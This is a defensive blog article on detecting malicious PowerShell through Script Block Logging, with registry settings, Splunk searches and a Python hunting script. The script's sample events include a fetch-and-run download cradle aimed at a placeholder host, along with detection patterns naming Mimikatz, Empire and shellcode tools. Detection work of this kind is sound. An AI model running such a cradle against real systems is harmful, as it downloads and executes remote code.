Hunting for Malicious PowerShell Using Script Block Logging

How to use PowerShell Script Block Logging to detect malicious scripts - configuration, analysis, and detection strategies.

powershell script-block-logging detection hunting windows

Originally published on Medium
Read the full article: Hunting Malicious PowerShell

Script Block Logging

PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, PowerShell 5.0 and later) records each script block as it is compiled, so the logged text is the code that actually ran - including content that was obfuscated or base64-encoded on the command line.

Enabling Script Block Logging

Group Policy

Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging

Registry

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1 -Type DWord

What Gets Logged

  • Full script content
  • Deobfuscated code
  • Function definitions
  • Module imports

Detection Patterns

Encoded Commands

index=windows EventCode=4104
  (ScriptBlockText="*FromBase64String*" OR ScriptBlockText="*-enc*")
| table _time, Computer, ScriptBlockText

Suspicious Keywords

index=windows EventCode=4104
  ScriptBlockText IN ("*Invoke-Mimikatz*", "*Invoke-Empire*", "*Invoke-Shellcode*")

Download Cradles

index=windows EventCode=4104
  ScriptBlockText="*Net.WebClient*" ScriptBlockText="*DownloadString*"

Hunting Tips

  • Baseline normal PowerShell usage
  • Alert on rare script blocks
  • Look for obfuscation indicators
  • Correlate with process creation
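The three detection patterns above and the obfuscation-indicator tip, combined into one offline rule set as an added example (not code from the original article or from the PowerShell-Hunter project). It runs the same encoded-command, suspicious-keyword and download-cradle checks over 4104 ScriptBlockText values, decodes any -EncodedCommand payload it finds so the rules can be applied to the decoded form as well, and scores obfuscation indicators instead of matching them once; the rule names, the score threshold of 3 and the sample events are assumptions made for the example.

```python
import base64
import re

# Detection rules mirroring the page's Splunk searches (case-insensitive regexes).
RULES = {
    "encoded_command": re.compile(r"FromBase64String|(?:^|\s)-enc(?!oding)\w*", re.I),
    "suspicious_keyword": re.compile(r"Invoke-(?:Mimikatz|Empire|Shellcode)", re.I),
    "download_cradle": re.compile(r"Net\.WebClient.*?DownloadString", re.I | re.S),
}
# Obfuscation indicators are counted, not matched once: a lone backtick or '+' is normal.
OBFUSCATION_INDICATORS = {
    "backtick": re.compile(r"`"),                # In`voke-style tick insertion
    "string_concat": re.compile(r"'\s*\+\s*'"),  # 'Ge'+'t-Process' fragments
    "char_cast": re.compile(r"\[char\]\s*\d+", re.I),
}
ENC_PAYLOAD = re.compile(r"-enc\w*\s+([A-Za-z0-9+/=]{8,})", re.I)

def decode_encoded_command(text):
    """Return the -EncodedCommand payload decoded from base64 + UTF-16LE, or None."""
    m = ENC_PAYLOAD.search(text)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def obfuscation_score(text):
    """Total indicator count; three or more is worth an analyst's look (assumed threshold)."""
    return sum(len(rx.findall(text)) for rx in OBFUSCATION_INDICATORS.values())

def analyze_event(event):
    """Run every rule over one 4104 event and over its decoded -enc payload, if any."""
    text = event["ScriptBlockText"]
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits += ["decoded:" + name for name, rx in RULES.items() if rx.search(decoded)]
    return {"Computer": event["Computer"], "rules": hits,
            "obfuscation_score": obfuscation_score(text), "decoded": decoded}

def hunt(events, threshold=3):
    """Keep only events that match a rule or reach the obfuscation threshold."""
    results = [analyze_event(e) for e in events]
    return [r for r in results if r["rules"] or r["obfuscation_score"] >= threshold]

# Constructed sample ScriptBlockText values (not real telemetry); the -enc payload is built here.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"Computer": "WS01", "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"},
    {"Computer": "WS02", "ScriptBlockText": "powershell.exe -enc "
        + base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")},
    {"Computer": "WS03", "ScriptBlockText": "$c=('Ge'+'t-Pr'+'oce'+'ss'); & $c; [char]72+[char]105"},
]
```

Running `hunt(SAMPLE_EVENTS)` drops the benign WS01 block, flags WS02 both for the -enc switch and for the cradle found only after decoding, and flags WS03 on obfuscation score alone even though no keyword rule fires.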